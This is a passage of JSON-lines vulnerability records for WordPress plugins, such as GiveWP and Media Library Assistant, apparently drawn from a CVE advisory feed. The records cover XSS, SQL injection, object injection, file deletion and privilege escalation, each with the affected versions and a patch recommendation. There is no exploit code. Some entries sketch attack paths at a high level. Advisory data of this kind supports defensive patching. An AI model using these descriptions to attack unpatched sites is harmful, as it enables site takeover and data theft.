version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3212723\\\/give\\\/tags\\\/3.19.3\\\/src\\\/Helpers\\\/Utils.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3212723\\\/give\\\/tags\\\/3.19.3\\\/src\\\/Helpers\\\/Utils.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b2143edf-5423-4e79-8638-a5b98490d292?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b2143edf-5423-4e79-8638-a5b98490d292?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5255","slug":"Ultimate_VC_Addons","versionImpact":"3.19.20","versionEndExcluding":"3.19.20.1","description":"The Ultimate Addons for WPBakery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's ultimate_dual_color shortcode in all versions up to, and including, 3.19.20 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.19.20.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/66d77518-a258-4e79-b483-275855c0a416?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/66d77518-a258-4e79-b483-275855c0a416?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/ultimate.brainstormforce.com\\\/changelog\\\/?utm_source=codecanyon-item-page&utm_campaign=uavc-changelog&utm_medium=changelog\",\"name\":\"https:\\\/\\\/ultimate.brainstormforce.com\\\/changelog\\\/?utm_source=codecanyon-item-page&utm_campaign=uavc-changelog&utm_medium=changelog\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5254","slug":"Ultimate_VC_Addons","versionImpact":"3.19.20","versionEndExcluding":"3.19.20.1","description":"The Ultimate Addons for WPBakery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's ultimate_info_banner shortcode in all versions up to, and including, 3.19.20 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.19.20.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4c8971e0-befd-47ac-8cb5-064f9cd757d7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4c8971e0-befd-47ac-8cb5-064f9cd757d7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/ultimate.brainstormforce.com\\\/changelog\\\/?utm_source=codecanyon-item-page&utm_campaign=uavc-changelog&utm_medium=changelog\",\"name\":\"https:\\\/\\\/ultimate.brainstormforce.com\\\/changelog\\\/?utm_source=codecanyon-item-page&utm_campaign=uavc-changelog&utm_medium=changelog\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5253","slug":"Ultimate_VC_Addons","versionImpact":"3.19.20","versionEndExcluding":"3.19.20.1","description":"The Ultimate Addons for WPBakery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's ult_team shortcode in all versions up to, and including, 3.19.20 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.19.20.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/97666e54-8e86-4f18-ae32-ad8ca607aeff?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/97666e54-8e86-4f18-ae32-ad8ca607aeff?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/ultimate.brainstormforce.com\\\/changelog\\\/?utm_source=codecanyon-item-page&utm_campaign=uavc-changelog&utm_medium=changelog\",\"name\":\"https:\\\/\\\/ultimate.brainstormforce.com\\\/changelog\\\/?utm_source=codecanyon-item-page&utm_campaign=uavc-changelog&utm_medium=changelog\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5252","slug":"Ultimate_VC_Addons","versionImpact":"3.19.20","versionEndExcluding":"3.19.20.1","description":"The Ultimate Addons for WPBakery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's ultimate_info_table shortcode in all versions up to, and including, 3.19.20 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.19.20.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/675937dc-a032-4bc4-a449-c815fcb12db6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/675937dc-a032-4bc4-a449-c815fcb12db6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/ultimate.brainstormforce.com\\\/changelog\\\/?utm_source=codecanyon-item-page&utm_campaign=uavc-changelog&utm_medium=changelog\",\"name\":\"https:\\\/\\\/ultimate.brainstormforce.com\\\/changelog\\\/?utm_source=codecanyon-item-page&utm_campaign=uavc-changelog&utm_medium=changelog\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5251","slug":"Ultimate_VC_Addons","versionImpact":"3.19.20","versionEndExcluding":"3.19.20.1","description":"The Ultimate Addons for WPBakery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's ultimate_pricing  shortcode in all versions up to, and including, 3.19.20 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.19.20.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e637044d-9b49-4de5-b8b8-d48a0e5e1afc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e637044d-9b49-4de5-b8b8-d48a0e5e1afc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/ultimate.brainstormforce.com\\\/changelog\\\/?utm_source=codecanyon-item-page&utm_campaign=uavc-changelog&utm_medium=changelog\",\"name\":\"https:\\\/\\\/ultimate.brainstormforce.com\\\/changelog\\\/?utm_source=codecanyon-item-page&utm_campaign=uavc-changelog&utm_medium=changelog\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11921","slug":"give","versionImpact":"3.18.0","versionEndExcluding":"3.19.0","description":"The GiveWP  WordPress plugin before 3.19.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"Update to version 3.19.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5f196294-5ba9-45b6-a27c-ab1702cc001f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5f196294-5ba9-45b6-a27c-ab1702cc001f\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5f196294-5ba9-45b6-a27c-ab1702cc001f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5f196294-5ba9-45b6-a27c-ab1702cc001f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4564","slug":"wp-ticketbai","versionImpact":"3.18","versionEndExcluding":"3.19","description":"The TicketBAI Facturas para WooCommerce plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation via the 'delpdf' action in all versions up to, and including, 3.18. This makes it possible for unauthenticated attackers to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","recommendation":"Update to version 3.19, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-ticketbai\\\/trunk\\\/wp-ticketbai.php#L240\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-ticketbai\\\/trunk\\\/wp-ticketbai.php#L240\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3292061\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3292061\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2927aa13-b012-41eb-93bd-38a4e5fc5455?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2927aa13-b012-41eb-93bd-38a4e5fc5455?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5544","slug":"media-library-assistant","versionImpact":"3.17","versionEndExcluding":"3.18","description":"The Media Library Assistant plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the order parameter in all versions up to, and including, 3.17 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.18, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cf0c34d3-5c7d-43a5-9430-2ebdc155123f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cf0c34d3-5c7d-43a5-9430-2ebdc155123f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3110092\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3110092\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13643","slug":"zox-news","versionImpact":"3.17.0","versionEndExcluding":"3.17.1","description":"The Zox News - Professional WordPress News & Magazine Theme plugin for WordPress is vulnerable to unauthorized data modification. This vulnerability can lead to privilege escalation and denial of service conditions due to missing capability checks on the backup_options() and reset_options() functions in all versions up to and including 3.17.0. This vulnerability allows authenticated attackers with Subscriber-level access and above to update and delete arbitrary option values on the WordPress site. Attackers can exploit this issue to update the default user role for registration to Administrator and enable user registration, thereby gaining administrative access to the vulnerable site. Additionally, they could delete critical options, causing errors that may disrupt the site's functionality and deny service to legitimate users.","recommendation":"Update to version 3.17.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/mvpthemes.com\\\/zoxnews\\\/\",\"name\":\"https:\\\/\\\/mvpthemes.com\\\/zoxnews\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/zox-news-professional-wordpress-news-magazine-theme\\\/20381541\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/zox-news-professional-wordpress-news-magazine-theme\\\/20381541\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4adb7436-11e6-4512-b6c9-551402909bf0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4adb7436-11e6-4512-b6c9-551402909bf0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12043","slug":"bdthemes-prime-slider-lite","versionImpact":"3.16.5","versionEndExcluding":"3.16.6","description":"The Prime Slider \u2013 Addons For Elementor (Revolution of a slider, Hero Slider, Post Slider and Ecommerce Slider) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'social_link_title' parameter of the 'blog' widget in all versions up to, and including, 3.16.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.16.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3222179%40bdthemes-prime-slider-lite&new=3222179%40bdthemes-prime-slider-lite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3222179%40bdthemes-prime-slider-lite&new=3222179%40bdthemes-prime-slider-lite&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/23e1fffa-9170-4bc2-ad7e-27708a08033b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/23e1fffa-9170-4bc2-ad7e-27708a08033b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3352","slug":"wp-smushit","versionImpact":"3.16.4","versionEndExcluding":"3.16.5","description":"The Smush plugin for WordPress is vulnerable to unauthorized deletion of the resmush list due to a missing capability check on the delete_resmush_list() function. This makes it possible for authenticated attackers, with minimal permissions such as a subscriber, to delete the resmush list for Nextgen or the Media Library.","recommendation":"Update to version 3.16.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dfbaa3e4-40c2-41d8-996c-232e27a04b73?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dfbaa3e4-40c2-41d8-996c-232e27a04b73?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3105107\\\/wp-smushit\\\/trunk\\\/app\\\/class-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3105107\\\/wp-smushit\\\/trunk\\\/app\\\/class-ajax.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9634","slug":"give","versionImpact":"3.16.3","versionEndExcluding":"3.16.4","description":"The GiveWP \u2013 Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.16.3 via deserialization of untrusted input from the give_company_name parameter. This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain allows attackers to achieve remote code execution.","recommendation":"Update to version 3.16.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b8eb3aa9-fe60-48b6-aa24-7873dd68b47e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b8eb3aa9-fe60-48b6-aa24-7873dd68b47e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/3.16.2\\\/src\\\/Donations\\\/Repositories\\\/DonationRepository.php?rev=3157829\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/3.16.2\\\/src\\\/Donations\\\/Repositories\\\/DonationRepository.php?rev=3157829\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3166836\\\/give\\\/tags\\\/3.16.4\\\/includes\\\/process-donation.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3166836\\\/give\\\/tags\\\/3.16.4\\\/includes\\\/process-donation.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1279","slug":"bm-builder","versionImpact":"3.16.2.1","versionEndExcluding":"3.16.3","description":"The BM Content Builder plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the ux_cb_tools_import_item_ajax AJAX action in all versions up to, and including, 3.16.2.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.","recommendation":"Update to version 3.16.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/art-simple-clean-wordpress-theme-for-creatives\\\/20170299\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/art-simple-clean-wordpress-theme-for-creatives\\\/20170299\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e4632899-c3bf-48f3-8a69-8fa32bfd902d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e4632899-c3bf-48f3-8a69-8fa32bfd902d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1777","slug":"bm-builder","versionImpact":"3.16.2.1","versionEndExcluding":"3.16.3","description":"The BM Content Builder plugin for WordPress is vulnerable to unauthorized modification of data to a missing capability check on the 'ux_cb_page_options_save' function in all versions up to, and including, 3.16.2.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.16.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.seatheme.net\\\/\",\"name\":\"https:\\\/\\\/www.seatheme.net\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fb3e0251-c3b7-4360-87f3-7e4612d4f285?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fb3e0251-c3b7-4360-87f3-7e4612d4f285?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8353","slug":"give","versionImpact":"3.16.1","versionEndExcluding":"3.16.2","description":"The GiveWP \u2013 Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.16.1 via deserialization of untrusted input via several parameters like 'give_title' and 'card_address'. This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain allows attackers to delete arbitrary files and achieve remote code execution. This is essentially the same vulnerability as CVE-2024-5932, however, it was discovered the the presence of stripslashes_deep on user_info allows the is_serialized check to be bypassed. This issue was mostly patched in 3.16.1, but further hardening was added in 3.16.2.","recommendation":"Update to version 3.16.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c4c530fa-eaf4-4721-bfb6-9fc06d7f343c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c4c530fa-eaf4-4721-bfb6-9fc06d7f343c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/3.16.0\\\/includes\\\/process-donation.php#L154\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/3.16.0\\\/includes\\\/process-donation.php#L154\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3149290\\\/give\\\/tags\\\/3.16.1\\\/includes\\\/process-donation.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3149290\\\/give\\\/tags\\\/3.16.1\\\/includes\\\/process-donation.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3149290\\\/give\\\/tags\\\/3.16.1\\\/includes\\\/admin\\\/admin-actions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3149290\\\/give\\\/tags\\\/3.16.1\\\/includes\\\/admin\\\/admin-actions.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3149290\\\/give\\\/tags\\\/3.16.1\\\/src\\\/Helpers\\\/Utils.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3149290\\\/give\\\/tags\\\/3.16.1\\\/src\\\/Helpers\\\/Utils.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157829\\\/give\\\/tags\\\/3.16.2\\\/includes\\\/process-donation.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157829\\\/give\\\/tags\\\/3.16.2\\\/includes\\\/process-donation.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6551","slug":"give","versionImpact":"3.15.1","versionEndExcluding":"3.16.0","description":"The GiveWP \u2013 Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 3.15.1. This is due to the plugin utilizing Symfony and leaving display_errors on within test files. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"Update to version 3.15.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2a13ce09-b312-4186-b0e2-63065c47f15d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2a13ce09-b312-4186-b0e2-63065c47f15d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/3.15.1\\\/vendor\\\/vendor-prefixed\\\/symfony\\\/http-foundation\\\/Tests\\\/Fixtures\\\/response-functional\\\/common.inc#L23\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/3.15.1\\\/vendor\\\/vendor-prefixed\\\/symfony\\\/http-foundation\\\/Tests\\\/Fixtures\\\/response-functional\\\/common.inc#L23\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3519","slug":"media-library-assistant","versionImpact":"3.15","versionEndExcluding":"3.16","description":"The Media Library Assistant plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the lang parameter in all versions up to, and including, 3.15 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e1cdaf3-76fe-4b73-b30b-4554f0d34d11?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e1cdaf3-76fe-4b73-b30b-4554f0d34d11?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3069819%40media-library-assistant%2Ftrunk&old=3060779%40media-library-assistant%2Ftrunk&sfp_email=&sfph_mail=#file3\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3069819%40media-library-assistant%2Ftrunk&old=3060779%40media-library-assistant%2Ftrunk&sfp_email=&sfph_mail=#file3\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3518","slug":"media-library-assistant","versionImpact":"3.15","versionEndExcluding":"3.16","description":"The Media Library Assistant plugin for WordPress is vulnerable to SQL Injection via the plugin's shortcode(s) in all versions up to, and including, 3.15 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor access or higher, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 3.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a7af1a03-8382-4593-a41f-8cdb1bb9e53b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a7af1a03-8382-4593-a41f-8cdb1bb9e53b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-assistant\\\/trunk\\\/includes\\\/class-mla-shortcode-custom-list.php#L1971\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/media-library-assistant\\\/trunk\\\/includes\\\/class-mla-shortcode-custom-list.php#L1971\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3069819%40media-library-assistant%2Ftrunk&old=3060779%40media-library-assistant%2Ftrunk&sfp_email=&sfph_mail=#file3\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3069819%40media-library-assistant%2Ftrunk&old=3060779%40media-library-assistant%2Ftrunk&sfp_email=&sfph_mail=#file3\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12852","slug":"happy-elementor-addons","versionImpact":"3.15.1","versionEndExcluding":"3.15.2","description":"The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'ha_cmc_text' parameter of the Happy Mouse Cursor in all versions up to, and including, 3.15.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.15.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3212495\\\/happy-elementor-addons\\\/tags\\\/3.15.2\\\/assets\\\/js\\\/custom-mouse-cursor.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3212495\\\/happy-elementor-addons\\\/tags\\\/3.15.2\\\/assets\\\/js\\\/custom-mouse-cursor.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e60d4528-2ec5-4a4b-be77-0fc012c13720?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e60d4528-2ec5-4a4b-be77-0fc012c13720?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8896","slug":"profile-builder","versionImpact":"3.14.3","versionEndExcluding":"3.14.4","description":"The User Profile Builder \u2013 Beautiful User Registration Forms, User Profiles & User Role Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'gdpr_communication_preferences[]' parameter in all versions up to, and including, 3.14.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This is only exploitable when the GDPR Communication Preferences module is enabled and at least one GDPR Communication Preferences field has been added to the edit profile form.","recommendation":"Update to version 3.14.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3344317%40profile-builder&new=3344317%40profile-builder&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3344317%40profile-builder&new=3344317%40profile-builder&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1d28e118-07d3-483e-87b8-66ccdb79e879?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1d28e118-07d3-483e-87b8-66ccdb79e879?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
